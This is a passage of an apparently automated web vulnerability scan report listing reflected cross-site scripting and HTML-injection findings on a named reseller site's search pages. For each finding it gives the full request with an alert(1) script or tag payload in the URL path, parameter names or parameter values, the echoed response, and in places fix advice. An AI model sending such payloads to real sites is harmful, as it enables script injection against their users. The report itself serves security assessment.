<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos2fc85<script>alert(1)</script>cdb365bab13/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5224. http://www.resellerbase.com/web-service/other/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6eccc<script>alert(1)</script>2281b465b4a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/search.php6eccc<script>alert(1)</script>2281b465b4a?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/search.php6eccc<script>alert(1)</script>2281b465b4a?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5225. http://www.resellerbase.com/web-service/other/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 93462<a>faf8c337c8b was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/search.php?keyword=search...&Submit3=Search93462<a>faf8c337c8b&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/search.php?keyword=search...&Submit3=Search93462<a>faf8c337c8b&opt=2 was not found on this server.</p>
...[SNIP]...

2.5226. http://www.resellerbase.com/web-service/other/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a6e6d<a>3c948d1f1f7 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/search.php?keyword=search...a6e6d<a>3c948d1f1f7&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/search.php?keyword=search...a6e6d<a>3c948d1f1f7&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5227. http://www.resellerbase.com/web-service/other/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ffd7c<script>alert(1)</script>e4fff6292ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&ffd7c<script>alert(1)</script>e4fff6292ee=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&ffd7c<script>alert(1)</script>e4fff6292ee=1 was not found on this server.</p>
...[SNIP]...

2.5228. http://www.resellerbase.com/web-service/other/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c505f<a>a36a8ffb5bc was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2c505f<a>a36a8ffb5bc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2c505f<a>a36a8ffb5bc was not found on this server.</p>
...[SNIP]...

2.5229. http://www.resellerbase.com/web-service/other/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 35093<script>alert(1)</script>a18e333b8d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service35093<script>alert(1)</script>a18e333b8d0/other/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service35093<script>alert(1)</script>a18e333b8d0/other/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5230. http://www.resellerbase.com/web-service/other/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c03a4<script>alert(1)</script>69c56e68e8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/otherc03a4<script>alert(1)</script>69c56e68e8b/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/otherc03a4<script>alert(1)</script>69c56e68e8b/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5231. http://www.resellerbase.com/web-service/other/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7324d<script>alert(1)</script>5ace756329b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes7324d<script>alert(1)</script>5ace756329b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes7324d<script>alert(1)</script>5ace756329b/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5232. http://www.resellerbase.com/web-service/other/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ca56b<script>alert(1)</script>015123381ca was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/search.phpca56b<script>alert(1)</script>015123381ca?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/search.phpca56b<script>alert(1)</script>015123381ca?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5233. http://www.resellerbase.com/web-service/other/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3c621<a>a8724b9a631 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/search.php?keyword=search...&Submit3=Search3c621<a>a8724b9a631&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/search.php?keyword=search...&Submit3=Search3c621<a>a8724b9a631&opt=2 was not found on this server.</p>
...[SNIP]...

2.5234. http://www.resellerbase.com/web-service/other/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload d48da<a>6f15a8a36f9 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/search.php?keyword=search...d48da<a>6f15a8a36f9&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/search.php?keyword=search...d48da<a>6f15a8a36f9&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5235. http://www.resellerbase.com/web-service/other/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 96f5e<script>alert(1)</script>4496c4ad79 was submitted as the name of an arbitrarily supplied request parameter and was echoed unmodified in the response. Note that the response is a 404 Not Found: the echo is in the error document's "The requested URL ... was not found on this server" line, which reproduces the raw request URI, so the reflecting component is the site's error handler rather than search.php itself.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the returned document. Because the sink echoes the raw URI, confirm delivery in the intended browser: many browsers percent-encode characters such as < and > in the request URL before sending it, and a handler that does not decode before echoing would then reflect the encoded form instead.

Request

GET /web-service/other/themes/search.php?keyword=search...&Submit3=Search&opt=2&96f5e<script>alert(1)</script>4496c4ad79=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/search.php?keyword=search...&Submit3=Search&opt=2&96f5e<script>alert(1)</script>4496c4ad79=1 was not found on this server.</p>
...[SNIP]...

2.5236. http://www.resellerbase.com/web-service/other/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 20b83<a>09df4897c8c was submitted in the opt parameter and was echoed unmodified in the response. Note that the response is a 404 Not Found: the echo is in the error document's "The requested URL ... was not found on this server" line, which reproduces the raw request URI, so the reflecting component is the site's error handler rather than search.php itself.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt to identify a full proof-of-concept for injecting arbitrary JavaScript was not successful; examine the application's behaviour manually for input validation or other obstacles. Because the sink echoes the raw URI, also confirm delivery in the intended browser: many browsers percent-encode characters such as < and > in the request URL before sending it, and a handler that does not decode before echoing would then reflect the encoded form instead.

Request

GET /web-service/other/themes/search.php?keyword=search...&Submit3=Search&opt=220b83<a>09df4897c8c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/search.php?keyword=search...&Submit3=Search&opt=220b83<a>09df4897c8c was not found on this server.</p>
...[SNIP]...

2.5237. http://www.resellerbase.com/web-service/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/search.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba83f"><script>alert(1)</script>14c39a1dc63d2ecda was submitted in the REST URL parameter 1 and was echoed unmodified in the response. The sink is the pagination link: its href is the full request URI with /more2.html appended, so the path segments, the query-string parameter names and the parameter values all reach the same double-quoted attribute, and the " in the payload closes it so that the rest is parsed as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because every part of the URI reaches this sink, the fix is to build the link from known parameters and HTML-encode the attribute value (htmlspecialchars with ENT_QUOTES) rather than to filter individual inputs.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-serviceba83f"><script>alert(1)</script>14c39a1dc63d2ecda/search.php?cat=3&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/web-serviceba83f"><script>alert(1)</script>14c39a1dc63d2ecda/search.php?cat=3&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc/more2.html" style="color: ">
...[SNIP]...

2.5238. http://www.resellerbase.com/web-service/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload babcd<script>alert(1)</script>fad309d5e13 was submitted in the REST URL parameter 1 and was echoed unmodified in the response. Note that the response is a 404 Not Found: the echo is in the error document's "The requested URL ... was not found on this server" line, which reproduces the raw request URI, so the reflecting component is the site's error handler rather than search.php itself.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the returned document. Because the sink echoes the raw URI, confirm delivery in the intended browser: many browsers percent-encode characters such as < and > in the request URL before sending it, and a handler that does not decode before echoing would then reflect the encoded form instead.

Request

GET /web-servicebabcd<script>alert(1)</script>fad309d5e13/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicebabcd<script>alert(1)</script>fad309d5e13/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5239. http://www.resellerbase.com/web-service/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/search.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40ec9"><script>alert(1)</script>04a2df4e23d2a01f2 was submitted in the REST URL parameter 2 and was echoed unmodified in the response. The sink is the pagination link: its href is the full request URI with /more2.html appended, so the path segments, the query-string parameter names and the parameter values all reach the same double-quoted attribute, and the " in the payload closes it so that the rest is parsed as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/search.php40ec9"><script>alert(1)</script>04a2df4e23d2a01f2?cat=3&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/web-service/search.php40ec9"><script>alert(1)</script>04a2df4e23d2a01f2?cat=3&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc/more2.html" style="color: ">
...[SNIP]...

2.5240. http://www.resellerbase.com/web-service/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9e829<script>alert(1)</script>5cf41c406b0 was submitted in the REST URL parameter 2 and was echoed unmodified in the response. Note that the response is a 404 Not Found: the echo is in the error document's "The requested URL ... was not found on this server" line, which reproduces the raw request URI, so the reflecting component is the site's error handler rather than search.php itself.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the returned document. Because the sink echoes the raw URI, confirm delivery in the intended browser: many browsers percent-encode characters such as < and > in the request URL before sending it, and a handler that does not decode before echoing would then reflect the encoded form instead.

Request

GET /web-service/search.php9e829<script>alert(1)</script>5cf41c406b0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
